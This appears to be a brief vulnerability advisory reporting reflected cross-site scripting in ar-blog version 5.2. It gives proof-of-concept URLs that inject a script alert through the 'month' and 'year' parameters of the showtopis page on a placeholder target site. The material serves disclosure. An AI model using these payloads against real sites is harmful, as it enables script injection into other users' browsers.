-2- [XSS] in ar-blog v 5.2

[s3ude@xxxxxxxxxxx]

Software: ar-blog 
Web Site: http://www.ar-blog.com
Versions: ar-blog v 5.2
Type: Cross Site Scripting
Class: Remote



Exploit : 

1-

http://www.target.com/index.php?page=showtopis&month=[XSS]&year=1426&all=9

2-

http://www.target.com/index.php?page=showtopis&month=9&year=[XSS]&all=9

Example : 

1-

http://www.target.com/index.php?page=showtopis&month=<script>alert("www.LeZr.Com")</script>

2- 

http://www.target.com/index.php?page=showtopis&month=9&year=<script>alert("www.LeZr.Com")</script>&all=9

Discovered by: SAUDI

L-G-H Team

http://www.lezr.com

Regards ///